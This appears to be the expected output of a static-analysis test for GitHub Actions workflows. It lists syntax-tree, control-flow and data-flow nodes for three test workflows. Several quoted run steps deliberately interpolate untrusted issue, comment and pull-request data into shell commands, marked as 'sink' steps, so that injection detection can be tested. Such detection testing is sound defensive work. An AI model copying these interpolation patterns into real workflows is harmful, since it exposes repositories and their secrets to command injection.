.github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| 
.github/workflows/multiline.yml:3:17:3:22 | Prev | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:5:9:5:17 | completed | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:14:9:26 | ubuntu-latest | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | 
.github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > 
event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | +| 
.github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files 
| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:25:20:25:21 | | 
.github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| 
.github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | +| .github/workflows/test.yml:39:9:40:53 
| Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +cfgNodes +| .github/workflows/expression_nodes.yml:1:1:21:47 | enter on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment | +| .github/workflows/expression_nodes.yml:1:1:21:47 | exit on: issue_comment (normal) | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| 
.github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:1:1:33:14 | enter on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: | +| .github/workflows/multiline.yml:1:1:33:14 | exit on: (normal) | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| 
.github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +dfNodes +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:9:5:33:14 | 
Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | 
.github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | 
.github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | 
.github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | 